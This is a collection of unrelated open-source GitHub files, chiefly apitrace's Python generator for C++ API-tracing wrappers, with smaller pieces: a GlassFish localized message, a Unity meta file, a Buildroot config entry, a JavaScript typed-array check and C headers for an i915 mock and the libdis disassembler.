# and Distribution License("CDDL") (collectively, the "License"). You
# may not use this file except in compliance with the License. You can
# obtain a copy of the License at
# https://glassfish.dev.java.net/public/CDDL+GPL_1_1.html
# or packager/legal/LICENSE.txt. See the License for the specific
# language governing permissions and limitations under the License.
#
# When distributing the software, include this License Header Notice in each
# file and include the License file at packager/legal/LICENSE.txt.
#
# GPL Classpath Exception:
# Oracle designates this particular file as subject to the "Classpath"
# exception as provided by Oracle in the GPL Version 2 section of the License
# file that accompanied this code.
#
# Modifications:
# If applicable, add the following below the License Header, with the fields
# enclosed by brackets [] replaced by your own identifying information:
# "Portions Copyright [year] [name of copyright owner]"
#
# Contributor(s):
# If you wish your version of this file to be governed by only the CDDL or
# only the GPL Version 2, indicate your decision by adding "[Contributor]
# elects to include this software in this distribution under the [CDDL or GPL
# Version 2] license." If you don't indicate a single choice of license, a
# recipient has the option to distribute your version of this file under
# either the CDDL, the GPL Version 2 or to extend the choice of license to
# its licensees as provided above. However, if you add GPL Version 2 code
# and therefore, elected the GPL Version 2 license, then the option applies
# only if the new code is made subject to such option by the copyright
# holder.
#
no_such_alias=\u3053\u306E\u30C9\u30E1\u30A4\u30F3\u306E\u30C7\u30D5\u30A9\u30EB\u30C8\u30FB\u30B9\u30C8\u30A2\u3067\u5B9A\u7FA9\u3055\u308C\u305F\u30C8\u30FC\u30AF\u30F3[{1}]\u306E\u30A8\u30A4\u30EA\u30A2\u30B9[{0}]\u304C\u3042\u308A\u307E\u305B\u3093\u3002"asadmin create-password-alias"\u306E\u3088\u3046\u306A\u7BA1\u7406\u30A4\u30F3\u30BF\u30D5\u30A7\u30FC\u30B9\u3092\u4F7F\u7528\u3057\u3066\u30A8\u30A4\u30EA\u30A2\u30B9\u3092\u5148\u306B\u4F5C\u6210\u3059\u308B\u5FC5\u8981\u304C\u3042\u308A\u307E\u3059\u3002
| {
"pile_set_name": "Github"
} |
##########################################################################
#
# Copyright 2008-2010 VMware, Inc.
# All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
##########################################################################/
"""Common trace code generation."""
# Adjust path
import os.path
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
import specs.stdapi as stdapi
def getWrapperInterfaceName(interface):
return "Wrap" + interface.expr
debug = False
class ComplexValueSerializer(stdapi.OnceVisitor):
'''Type visitors which generates serialization functions for
complex types.
Simple types are serialized inline.
'''
def __init__(self, serializer):
stdapi.OnceVisitor.__init__(self)
self.serializer = serializer
def visitVoid(self, literal):
pass
def visitLiteral(self, literal):
pass
def visitString(self, string):
pass
def visitConst(self, const):
self.visit(const.type)
def visitStruct(self, struct):
print 'static const char * _struct%s_members[%u] = {' % (struct.tag, len(struct.members))
for type, name, in struct.members:
if name is None:
print ' "",'
else:
print ' "%s",' % (name,)
print '};'
print 'static const trace::StructSig _struct%s_sig = {' % (struct.tag,)
if struct.name is None:
structName = '""'
else:
structName = '"%s"' % struct.name
print ' %u, %s, %u, _struct%s_members' % (struct.id, structName, len(struct.members), struct.tag)
print '};'
print
def visitArray(self, array):
self.visit(array.type)
def visitAttribArray(self, array):
pass
def visitBlob(self, array):
pass
def visitEnum(self, enum):
print 'static const trace::EnumValue _enum%s_values[] = {' % (enum.tag)
for value in enum.values:
print ' {"%s", %s},' % (value, value)
print '};'
print
print 'static const trace::EnumSig _enum%s_sig = {' % (enum.tag)
print ' %u, %u, _enum%s_values' % (enum.id, len(enum.values), enum.tag)
print '};'
print
def visitBitmask(self, bitmask):
print 'static const trace::BitmaskFlag _bitmask%s_flags[] = {' % (bitmask.tag)
for value in bitmask.values:
print ' {"%s", %s},' % (value, value)
print '};'
print
print 'static const trace::BitmaskSig _bitmask%s_sig = {' % (bitmask.tag)
print ' %u, %u, _bitmask%s_flags' % (bitmask.id, len(bitmask.values), bitmask.tag)
print '};'
print
def visitPointer(self, pointer):
self.visit(pointer.type)
def visitIntPointer(self, pointer):
pass
def visitObjPointer(self, pointer):
self.visit(pointer.type)
def visitLinearPointer(self, pointer):
self.visit(pointer.type)
def visitHandle(self, handle):
self.visit(handle.type)
def visitReference(self, reference):
self.visit(reference.type)
def visitAlias(self, alias):
self.visit(alias.type)
def visitOpaque(self, opaque):
pass
def visitInterface(self, interface):
pass
def visitPolymorphic(self, polymorphic):
if not polymorphic.contextLess:
return
print 'static void _write__%s(int selector, %s const & value) {' % (polymorphic.tag, polymorphic.expr)
print ' switch (selector) {'
for cases, type in polymorphic.iterSwitch():
for case in cases:
print ' %s:' % case
self.serializer.visit(type, 'static_cast<%s>(value)' % (type,))
print ' break;'
print ' }'
print '}'
print
class ValueSerializer(stdapi.Visitor, stdapi.ExpanderMixin):
'''Visitor which generates code to serialize any type.
Simple types are serialized inline here, whereas the serialization of
complex types is dispatched to the serialization functions generated by
ComplexValueSerializer visitor above.
'''
def visitLiteral(self, literal, instance):
print ' trace::localWriter.write%s(%s);' % (literal.kind, instance)
def visitString(self, string, instance):
if not string.wide:
cast = 'const char *'
suffix = 'String'
else:
cast = 'const wchar_t *'
suffix = 'WString'
if cast != string.expr:
# reinterpret_cast is necessary for GLubyte * <=> char *
instance = 'reinterpret_cast<%s>(%s)' % (cast, instance)
if string.length is not None:
length = ', %s' % self.expand(string.length)
else:
length = ''
print ' trace::localWriter.write%s(%s%s);' % (suffix, instance, length)
def visitConst(self, const, instance):
self.visit(const.type, instance)
def visitStruct(self, struct, instance):
print ' trace::localWriter.beginStruct(&_struct%s_sig);' % (struct.tag,)
for member in struct.members:
self.visitMember(member, instance)
print ' trace::localWriter.endStruct();'
def visitArray(self, array, instance):
length = '_c' + array.type.tag
index = '_i' + array.type.tag
array_length = self.expand(array.length)
print ' if (%s) {' % instance
print ' size_t %s = %s > 0 ? %s : 0;' % (length, array_length, array_length)
print ' trace::localWriter.beginArray(%s);' % length
print ' for (size_t %s = 0; %s < %s; ++%s) {' % (index, index, length, index)
print ' trace::localWriter.beginElement();'
self.visitElement(index, array.type, '(%s)[%s]' % (instance, index))
print ' trace::localWriter.endElement();'
print ' }'
print ' trace::localWriter.endArray();'
print ' } else {'
print ' trace::localWriter.writeNull();'
print ' }'
def visitAttribArray(self, array, instance):
# For each element, decide if it is a key or a value (which depends on the previous key).
# If it is a value, store it as the right type - usually int, some bitfield, or some enum.
# It is currently assumed that an unknown key means that it is followed by an int value.
# determine the array length which must be passed to writeArray() up front
count = '_c' + array.baseType.tag
print ' {'
print ' int %s;' % count
print ' for (%(c)s = 0; %(array)s && %(array)s[%(c)s] != %(terminator)s; %(c)s += 2) {' \
% {'c': count, 'array': instance, 'terminator': array.terminator}
if array.hasKeysWithoutValues:
print ' switch (int(%(array)s[%(c)s])) {' % {'array': instance, 'c': count}
for key, valueType in array.valueTypes:
if valueType is None:
print ' case %s:' % key
print ' %s--;' % count # the next value is a key again and checked if it's the terminator
print ' break;'
print ' }'
print ' }'
print ' %(c)s += %(array)s ? 1 : 0;' % {'c': count, 'array': instance}
print ' trace::localWriter.beginArray(%s);' % count
# for each key / key-value pair write the key and the value, if the key requires one
index = '_i' + array.baseType.tag
print ' for (int %(i)s = 0; %(i)s < %(count)s; %(i)s++) {' % {'i': index, 'count': count}
print ' trace::localWriter.beginElement();'
self.visit(array.baseType, "%(array)s[%(i)s]" % {'array': instance, 'i': index})
print ' trace::localWriter.endElement();'
print ' if (%(i)s + 1 >= %(count)s) {' % {'i': index, 'count': count}
print ' break;'
print ' }'
print ' switch (int(%(array)s[%(i)s++])) {' % {'array': instance, 'i': index}
# write generic value the usual way
for key, valueType in array.valueTypes:
if valueType is not None:
print ' case %s:' % key
print ' trace::localWriter.beginElement();'
self.visitElement(index, valueType, '(%(array)s)[%(i)s]' % {'array': instance, 'i': index})
print ' trace::localWriter.endElement();'
print ' break;'
# known key with no value, just decrease the index so we treat the next value as a key
if array.hasKeysWithoutValues:
for key, valueType in array.valueTypes:
if valueType is None:
print ' case %s:' % key
print ' %s--;' % index
print ' break;'
# unknown key, write an int value
print ' default:'
print ' trace::localWriter.beginElement();'
print ' os::log("apitrace: warning: %s: unknown key 0x%04X, interpreting value as int\\n", ' + \
'__FUNCTION__, int(%(array)s[%(i)s - 1]));' % {'array': instance, 'i': index}
print ' trace::localWriter.writeSInt(%(array)s[%(i)s]);' % {'array': instance, 'i': index}
print ' trace::localWriter.endElement();'
print ' break;'
print ' }'
print ' }'
print ' trace::localWriter.endArray();'
print ' }'
def visitBlob(self, blob, instance):
print ' trace::localWriter.writeBlob(%s, %s);' % (instance, self.expand(blob.size))
def visitEnum(self, enum, instance):
print ' trace::localWriter.writeEnum(&_enum%s_sig, %s);' % (enum.tag, instance)
def visitBitmask(self, bitmask, instance):
print ' trace::localWriter.writeBitmask(&_bitmask%s_sig, %s);' % (bitmask.tag, instance)
def visitPointer(self, pointer, instance):
print ' if (%s) {' % instance
print ' trace::localWriter.beginArray(1);'
print ' trace::localWriter.beginElement();'
self.visit(pointer.type, "*" + instance)
print ' trace::localWriter.endElement();'
print ' trace::localWriter.endArray();'
print ' } else {'
print ' trace::localWriter.writeNull();'
print ' }'
def visitIntPointer(self, pointer, instance):
print ' trace::localWriter.writePointer((uintptr_t)%s);' % instance
def visitObjPointer(self, pointer, instance):
print ' trace::localWriter.writePointer((uintptr_t)%s);' % instance
def visitLinearPointer(self, pointer, instance):
print ' trace::localWriter.writePointer((uintptr_t)%s);' % instance
def visitReference(self, reference, instance):
self.visit(reference.type, instance)
def visitHandle(self, handle, instance):
self.visit(handle.type, instance)
def visitAlias(self, alias, instance):
self.visit(alias.type, instance)
def visitOpaque(self, opaque, instance):
print ' trace::localWriter.writePointer((uintptr_t)%s);' % instance
def visitInterface(self, interface, instance):
assert False
def visitPolymorphic(self, polymorphic, instance):
if polymorphic.contextLess:
print ' _write__%s(%s, %s);' % (polymorphic.tag, polymorphic.switchExpr, instance)
else:
switchExpr = self.expand(polymorphic.switchExpr)
print ' switch (%s) {' % switchExpr
for cases, type in polymorphic.iterSwitch():
for case in cases:
print ' %s:' % case
caseInstance = instance
if type.expr is not None:
caseInstance = 'static_cast<%s>(%s)' % (type, caseInstance)
self.visit(type, caseInstance)
print ' break;'
if polymorphic.defaultType is None:
print r' default:'
print r' os::log("apitrace: warning: %%s: unexpected polymorphic case %%i\n", __FUNCTION__, (int)%s);' % (switchExpr,)
print r' trace::localWriter.writeNull();'
print r' break;'
print ' }'
class WrapDecider(stdapi.Traverser):
'''Type visitor which will decide wheter this type will need wrapping or not.
For complex types (arrays, structures), we need to know this before hand.
'''
def __init__(self):
self.needsWrapping = False
def visitLinearPointer(self, void):
pass
def visitInterface(self, interface):
self.needsWrapping = True
class ValueWrapper(stdapi.Traverser, stdapi.ExpanderMixin):
'''Type visitor which will generate the code to wrap an instance.
Wrapping is necessary mostly for interfaces, however interface pointers can
appear anywhere inside complex types.
'''
def visitStruct(self, struct, instance):
for member in struct.members:
self.visitMember(member, instance)
def visitArray(self, array, instance):
array_length = self.expand(array.length)
print " if (%s) {" % instance
print " for (size_t _i = 0, _s = %s; _i < _s; ++_i) {" % array_length
self.visitElement('_i', array.type, instance + "[_i]")
print " }"
print " }"
def visitPointer(self, pointer, instance):
print " if (%s) {" % instance
self.visit(pointer.type, "*" + instance)
print " }"
def visitObjPointer(self, pointer, instance):
elem_type = pointer.type.mutable()
if isinstance(elem_type, stdapi.Interface):
self.visitInterfacePointer(elem_type, instance)
elif isinstance(elem_type, stdapi.Alias) and isinstance(elem_type.type, stdapi.Interface):
self.visitInterfacePointer(elem_type.type, instance)
else:
self.visitPointer(pointer, instance)
def visitInterface(self, interface, instance):
raise NotImplementedError
def visitInterfacePointer(self, interface, instance):
print " if (%s) {" % instance
print " %s = %s::_Create(__FUNCTION__, %s);" % (instance, getWrapperInterfaceName(interface), instance)
print " }"
def visitPolymorphic(self, type, instance):
# XXX: There might be polymorphic values that need wrapping in the future
raise NotImplementedError
class ValueUnwrapper(ValueWrapper):
'''Reverse of ValueWrapper.'''
allocated = False
def visitStruct(self, struct, instance):
if not self.allocated:
# Argument is constant. We need to create a non const
print ' {'
print " %s * _t = static_cast<%s *>(alloca(sizeof *_t));" % (struct, struct)
print ' *_t = %s;' % (instance,)
assert instance.startswith('*')
print ' %s = _t;' % (instance[1:],)
instance = '*_t'
self.allocated = True
try:
return ValueWrapper.visitStruct(self, struct, instance)
finally:
print ' }'
else:
return ValueWrapper.visitStruct(self, struct, instance)
def visitArray(self, array, instance):
if self.allocated or isinstance(instance, stdapi.Interface):
return ValueWrapper.visitArray(self, array, instance)
array_length = self.expand(array.length)
elem_type = array.type.mutable()
print " if (%s && %s) {" % (instance, array_length)
print " %s * _t = static_cast<%s *>(alloca(%s * sizeof *_t));" % (elem_type, elem_type, array_length)
print " for (size_t _i = 0, _s = %s; _i < _s; ++_i) {" % array_length
print " _t[_i] = %s[_i];" % instance
self.allocated = True
self.visit(array.type, "_t[_i]")
print " }"
print " %s = _t;" % instance
print " }"
def visitInterfacePointer(self, interface, instance):
print r' if (%s) {' % instance
print r' const %s *pWrapper = static_cast<const %s*>(%s);' % (getWrapperInterfaceName(interface), getWrapperInterfaceName(interface), instance)
print r' if (pWrapper && pWrapper->m_dwMagic == 0xd8365d6c) {'
print r' %s = pWrapper->m_pInstance;' % (instance,)
print r' } else {'
print r' os::log("apitrace: warning: %%s: unexpected %%s pointer\n", __FUNCTION__, "%s");' % interface.name
print r' }'
print r' }'
class Tracer:
'''Base class to orchestrate the code generation of API tracing.'''
# 0-3 are reserved to memcpy, malloc, free, and realloc
__id = 4
def __init__(self):
self.api = None
def serializerFactory(self):
'''Create a serializer.
Can be overriden by derived classes to inject their own serialzer.
'''
return ValueSerializer()
def traceApi(self, api):
self.api = api
self.header(api)
# Includes
for module in api.modules:
for header in module.headers:
print header
print
# Generate the serializer functions
visitor = ComplexValueSerializer(self.serializerFactory())
for module in api.modules:
self.traceTypeDeclBegin( module )
types = module.getAllTypes()
map(visitor.visit, types)
self.traceTypeDeclEnd( module )
print
# Interfaces wrapers
self.traceInterfaces(api)
# Function wrappers
self.interface = None
self.base = None
for module in api.modules:
self.traceFunctionDeclBegin( module )
for function in module.getAllFunctions():
self.traceFunctionDecl(function)
self.traceFunctionDeclEnd( module )
print
for module in api.modules:
self.traceFunctionImplBegin( module )
for function in module.getAllFunctions():
self.traceFunctionImpl(function)
self.traceFunctionImplEnd( module );
print
self.footer(api)
def header(self, api):
print '#ifdef _WIN32'
print '# include <malloc.h> // alloca'
print '# ifndef alloca'
print '# define alloca _alloca'
print '# endif'
print '#else'
print '# include <alloca.h> // alloca'
print '#endif'
print
print
print 'static std::map<void *, void *> g_WrappedObjects;'
def footer(self, api):
pass
def traceModuleGuardBegin(self, module):
pass
def traceModuleGuardEnd(self, module):
pass
def traceFunctionImplBegin(self, module):
self.traceModuleGuardBegin( module )
def traceFunctionImplEnd(self, module):
self.traceModuleGuardEnd( module )
def traceFunctionDeclBegin(self, module):
self.traceModuleGuardBegin( module )
def traceFunctionDeclEnd(self, module):
self.traceModuleGuardEnd( module )
def traceTypeDeclBegin(self, module):
self.traceModuleGuardBegin( module )
def traceTypeDeclEnd(self, module):
self.traceModuleGuardEnd( module )
def traceFunctionDecl(self, function):
# Per-function declarations
if not function.internal:
if function.args:
print 'static const char * _%s_args[%u] = {%s};' % (function.name, len(function.args), ', '.join(['"%s"' % arg.name for arg in function.args]))
else:
print 'static const char ** _%s_args = NULL;' % (function.name,)
print 'static const trace::FunctionSig _%s_sig = {%u, "%s", %u, _%s_args};' % (function.name, self.getFunctionSigId(), function.name, len(function.args), function.name)
print
def getFunctionSigId(self):
id = Tracer.__id
Tracer.__id += 1
return id
def isFunctionPublic(self, function):
return True
def traceFunctionImpl(self, function):
if self.isFunctionPublic(function):
print 'extern "C" PUBLIC'
else:
print 'extern "C" PRIVATE'
print function.prototype() + ' {'
if function.type is not stdapi.Void:
print ' %s _result;' % function.type
self.traceFunctionImplBody(function)
if function.type is not stdapi.Void:
print ' return _result;'
print '}'
print
def traceFunctionImplBody(self, function):
if not function.internal:
print ' unsigned _call = trace::localWriter.beginEnter(&_%s_sig);' % (function.name,)
for arg in function.args:
if not arg.output:
self.unwrapArg(function, arg)
for arg in function.args:
if not arg.output:
self.serializeArg(function, arg)
print ' trace::localWriter.endEnter();'
self.invokeFunction(function)
if not function.internal:
print ' trace::localWriter.beginLeave(_call);'
print ' if (%s) {' % self.wasFunctionSuccessful(function)
for arg in function.args:
if arg.output:
self.serializeArg(function, arg)
self.wrapArg(function, arg)
print ' }'
if function.type is not stdapi.Void:
self.serializeRet(function, "_result")
if function.type is not stdapi.Void:
self.wrapRet(function, "_result")
print ' trace::localWriter.endLeave();'
def invokeFunction(self, function):
self.doInvokeFunction(function)
def doInvokeFunction(self, function, prefix='_', suffix=''):
# Same as invokeFunction() but called both when trace is enabled or disabled.
if function.type is stdapi.Void:
result = ''
else:
result = '_result = '
dispatch = prefix + function.name + suffix
print ' %s%s(%s);' % (result, dispatch, ', '.join([str(arg.name) for arg in function.args]))
def wasFunctionSuccessful(self, function):
if function.type is stdapi.Void:
return 'true'
if str(function.type) == 'HRESULT':
return 'SUCCEEDED(_result)'
return 'true'
def serializeArg(self, function, arg):
print ' trace::localWriter.beginArg(%u);' % (arg.index,)
self.serializeArgValue(function, arg)
print ' trace::localWriter.endArg();'
def serializeArgValue(self, function, arg):
self.serializeValue(arg.type, arg.name)
def wrapArg(self, function, arg):
assert not isinstance(arg.type, stdapi.ObjPointer)
from specs.winapi import REFIID
riid = None
for other_arg in function.args:
if not other_arg.output and other_arg.type is REFIID:
riid = other_arg
if riid is not None \
and isinstance(arg.type, stdapi.Pointer) \
and isinstance(arg.type.type, stdapi.ObjPointer):
self.wrapIid(function, riid, arg)
return
self.wrapValue(arg.type, arg.name)
def unwrapArg(self, function, arg):
self.unwrapValue(arg.type, arg.name)
def serializeRet(self, function, instance):
print ' trace::localWriter.beginReturn();'
self.serializeValue(function.type, instance)
print ' trace::localWriter.endReturn();'
def serializeValue(self, type, instance):
serializer = self.serializerFactory()
serializer.visit(type, instance)
def wrapRet(self, function, instance):
self.wrapValue(function.type, instance)
def needsWrapping(self, type):
visitor = WrapDecider()
visitor.visit(type)
return visitor.needsWrapping
def wrapValue(self, type, instance):
if self.needsWrapping(type):
visitor = ValueWrapper()
visitor.visit(type, instance)
def unwrapValue(self, type, instance):
if self.needsWrapping(type):
visitor = ValueUnwrapper()
visitor.visit(type, instance)
def traceInterfaces(self, api):
interfaces = api.getAllInterfaces()
if not interfaces:
return
map(self.declareWrapperInterface, interfaces)
self.implementIidWrapper(api)
map(self.implementWrapperInterface, interfaces)
print
def declareWrapperInterface(self, interface):
print "class %s : public %s " % (getWrapperInterfaceName(interface), interface.name)
print "{"
print "private:"
print " %s(%s * pInstance);" % (getWrapperInterfaceName(interface), interface.name)
print " virtual ~%s();" % getWrapperInterfaceName(interface)
print "public:"
print " static %s* _Create(const char *functionName, %s * pInstance);" % (getWrapperInterfaceName(interface), interface.name)
print
for method in interface.iterMethods():
print " " + method.prototype() + ";"
print
for type, name, value in self.enumWrapperInterfaceVariables(interface):
print ' %s %s;' % (type, name)
for i in range(64):
print r' virtual void _dummy%i(void) const {' % i
print r' os::log("error: %s: unexpected virtual method\n");' % interface.name
print r' os::abort();'
print r' }'
print "};"
print
def enumWrapperInterfaceVariables(self, interface):
return [
("DWORD", "m_dwMagic", "0xd8365d6c"),
("%s *" % interface.name, "m_pInstance", "pInstance"),
("void *", "m_pVtbl", "*(void **)pInstance"),
("UINT", "m_NumMethods", len(list(interface.iterBaseMethods()))),
]
def implementWrapperInterface(self, interface):
self.interface = interface
# Private constructor
print '%s::%s(%s * pInstance) {' % (getWrapperInterfaceName(interface), getWrapperInterfaceName(interface), interface.name)
for type, name, value in self.enumWrapperInterfaceVariables(interface):
if value is not None:
print ' %s = %s;' % (name, value)
print '}'
print
# Public constructor
print '%s *%s::_Create(const char *functionName, %s * pInstance) {' % (getWrapperInterfaceName(interface), getWrapperInterfaceName(interface), interface.name)
print r' std::map<void *, void *>::const_iterator it = g_WrappedObjects.find(pInstance);'
print r' if (it != g_WrappedObjects.end()) {'
print r' Wrap%s *pWrapper = (Wrap%s *)it->second;' % (interface.name, interface.name)
print r' assert(pWrapper);'
print r' assert(pWrapper->m_dwMagic == 0xd8365d6c);'
print r' assert(pWrapper->m_pInstance == pInstance);'
print r' if (pWrapper->m_pVtbl == *(void **)pInstance &&'
print r' pWrapper->m_NumMethods >= %s) {' % len(list(interface.iterBaseMethods()))
if debug:
print r' os::log("%s: fetched pvObj=%p pWrapper=%p pVtbl=%p\n", functionName, pInstance, pWrapper, pWrapper->m_pVtbl);'
print r' return pWrapper;'
print r' }'
print r' }'
print r' Wrap%s *pWrapper = new Wrap%s(pInstance);' % (interface.name, interface.name)
if debug:
print r' os::log("%%s: created %s pvObj=%%p pWrapper=%%p pVtbl=%%p\n", functionName, pInstance, pWrapper, pWrapper->m_pVtbl);' % interface.name
print r' g_WrappedObjects[pInstance] = pWrapper;'
print r' return pWrapper;'
print '}'
print
# Destructor
print '%s::~%s() {' % (getWrapperInterfaceName(interface), getWrapperInterfaceName(interface))
if debug:
print r' os::log("%s::Release: deleted pvObj=%%p pWrapper=%%p pVtbl=%%p\n", m_pInstance, this, m_pVtbl);' % interface.name
print r' g_WrappedObjects.erase(m_pInstance);'
print '}'
print
for base, method in interface.iterBaseMethods():
self.base = base
self.implementWrapperInterfaceMethod(interface, base, method)
print
def implementWrapperInterfaceMethod(self, interface, base, method):
print method.prototype(getWrapperInterfaceName(interface) + '::' + method.name) + ' {'
if False:
print r' os::log("%%s(%%p -> %%p)\n", "%s", this, m_pInstance);' % (getWrapperInterfaceName(interface) + '::' + method.name)
if method.type is not stdapi.Void:
print ' %s _result;' % method.type
self.implementWrapperInterfaceMethodBody(interface, base, method)
if method.type is not stdapi.Void:
print ' return _result;'
print '}'
print
def implementWrapperInterfaceMethodBody(self, interface, base, method):
assert not method.internal
print ' static const char * _args[%u] = {%s};' % (len(method.args) + 1, ', '.join(['"this"'] + ['"%s"' % arg.name for arg in method.args]))
print ' static const trace::FunctionSig _sig = {%u, "%s", %u, _args};' % (self.getFunctionSigId(), interface.name + '::' + method.name, len(method.args) + 1)
print ' %s *_this = static_cast<%s *>(m_pInstance);' % (base, base)
print ' unsigned _call = trace::localWriter.beginEnter(&_sig);'
print ' trace::localWriter.beginArg(0);'
print ' trace::localWriter.writePointer((uintptr_t)m_pInstance);'
print ' trace::localWriter.endArg();'
for arg in method.args:
if not arg.output:
self.unwrapArg(method, arg)
for arg in method.args:
if not arg.output:
self.serializeArg(method, arg)
print ' trace::localWriter.endEnter();'
self.invokeMethod(interface, base, method)
print ' trace::localWriter.beginLeave(_call);'
print ' if (%s) {' % self.wasFunctionSuccessful(method)
for arg in method.args:
if arg.output:
self.serializeArg(method, arg)
self.wrapArg(method, arg)
print ' }'
if method.type is not stdapi.Void:
self.serializeRet(method, '_result')
if method.type is not stdapi.Void:
self.wrapRet(method, '_result')
if method.name == 'Release':
assert method.type is not stdapi.Void
print r' if (!_result) {'
print r' delete this;'
print r' }'
print ' trace::localWriter.endLeave();'
def implementIidWrapper(self, api):
print r'static void'
print r'warnIID(const char *functionName, REFIID riid, const char *reason) {'
print r' os::log("apitrace: warning: %s: %s IID {0x%08lX,0x%04X,0x%04X,{0x%02X,0x%02X,0x%02X,0x%02X,0x%02X,0x%02X,0x%02X,0x%02X}}\n",'
print r' functionName, reason,'
print r' riid.Data1, riid.Data2, riid.Data3,'
print r' riid.Data4[0], riid.Data4[1], riid.Data4[2], riid.Data4[3], riid.Data4[4], riid.Data4[5], riid.Data4[6], riid.Data4[7]);'
print r'}'
print
print r'static void'
print r'wrapIID(const char *functionName, REFIID riid, void * * ppvObj) {'
print r' if (!ppvObj || !*ppvObj) {'
print r' return;'
print r' }'
else_ = ''
for iface in api.getAllInterfaces():
print r' %sif (riid == IID_%s) {' % (else_, iface.name)
print r' *ppvObj = Wrap%s::_Create(functionName, (%s *) *ppvObj);' % (iface.name, iface.name)
print r' }'
else_ = 'else '
print r' %s{' % else_
print r' warnIID(functionName, riid, "unknown");'
print r' }'
print r'}'
print
def wrapIid(self, function, riid, out):
# Cast output arg to `void **` if necessary
out_name = out.name
obj_type = out.type.type.type
if not obj_type is stdapi.Void:
assert isinstance(obj_type, stdapi.Interface)
out_name = 'reinterpret_cast<void * *>(%s)' % out_name
print r' if (%s && *%s) {' % (out.name, out.name)
functionName = function.name
else_ = ''
if self.interface is not None:
functionName = self.interface.name + '::' + functionName
print r' if (*%s == m_pInstance &&' % (out_name,)
print r' (%s)) {' % ' || '.join('%s == IID_%s' % (riid.name, iface.name) for iface in self.interface.iterBases())
print r' *%s = this;' % (out_name,)
print r' }'
else_ = 'else '
print r' %s{' % else_
print r' wrapIID("%s", %s, %s);' % (functionName, riid.name, out_name)
print r' }'
print r' }'
def invokeMethod(self, interface, base, method):
if method.type is stdapi.Void:
result = ''
else:
result = '_result = '
print ' %s_this->%s(%s);' % (result, method.name, ', '.join([str(arg.name) for arg in method.args]))
def emit_memcpy(self, ptr, size):
print ' trace::fakeMemcpy(%s, %s);' % (ptr, size)
def fake_call(self, function, args):
print ' unsigned _fake_call = trace::localWriter.beginEnter(&_%s_sig, true);' % (function.name,)
for arg, instance in zip(function.args, args):
assert not arg.output
print ' trace::localWriter.beginArg(%u);' % (arg.index,)
self.serializeValue(arg.type, instance)
print ' trace::localWriter.endArg();'
print ' trace::localWriter.endEnter();'
print ' trace::localWriter.beginLeave(_fake_call);'
print ' trace::localWriter.endLeave();'
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: 1d9548d9a173a40e4b758ecf6e4fed49
timeCreated: 1457326885
licenseType: Store
MonoImporter:
serializedVersion: 2
defaultReferences: []
executionOrder: 0
icon: {instanceID: 0}
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
config BR2_PACKAGE_PYTHON_TWISTED
bool "python-twisted"
depends on BR2_PACKAGE_PYTHON
select BR2_PACKAGE_PYTHON_ZOPE_INTERFACE # runtime
help
Twisted is an event-driven networking engine written in Python.
https://twistedmatrix.com/trac/
| {
"pile_set_name": "Github"
} |
module.exports = isTypedArray
isTypedArray.strict = isStrictTypedArray
isTypedArray.loose = isLooseTypedArray
var toString = Object.prototype.toString
var names = {
'[object Int8Array]': true
, '[object Int16Array]': true
, '[object Int32Array]': true
, '[object Uint8Array]': true
, '[object Uint8ClampedArray]': true
, '[object Uint16Array]': true
, '[object Uint32Array]': true
, '[object Float32Array]': true
, '[object Float64Array]': true
}
function isTypedArray(arr) {
return (
isStrictTypedArray(arr)
|| isLooseTypedArray(arr)
)
}
function isStrictTypedArray(arr) {
return (
arr instanceof Int8Array
|| arr instanceof Int16Array
|| arr instanceof Int32Array
|| arr instanceof Uint8Array
|| arr instanceof Uint8ClampedArray
|| arr instanceof Uint16Array
|| arr instanceof Uint32Array
|| arr instanceof Float32Array
|| arr instanceof Float64Array
)
}
function isLooseTypedArray(arr) {
return names[toString.call(arr)]
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright © 2016 Intel Corporation
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
* IN THE SOFTWARE.
*
*/
#ifndef __MOCK_REQUEST__
#define __MOCK_REQUEST__
#include <linux/list.h>
#include "../i915_request.h"
struct i915_request *
mock_request(struct intel_context *ce, unsigned long delay);
bool mock_cancel_request(struct i915_request *request);
#endif /* !__MOCK_REQUEST__ */
| {
"pile_set_name": "Github"
} |
#include "libdis.h"
#include "ia32_settings.h"
#include "ia32_reg.h"
#include "ia32_insn.h"
ia32_settings_t ia32_settings = {
1, 0xF4,
MAX_INSTRUCTION_SIZE,
4, 4, 8, 4, 8,
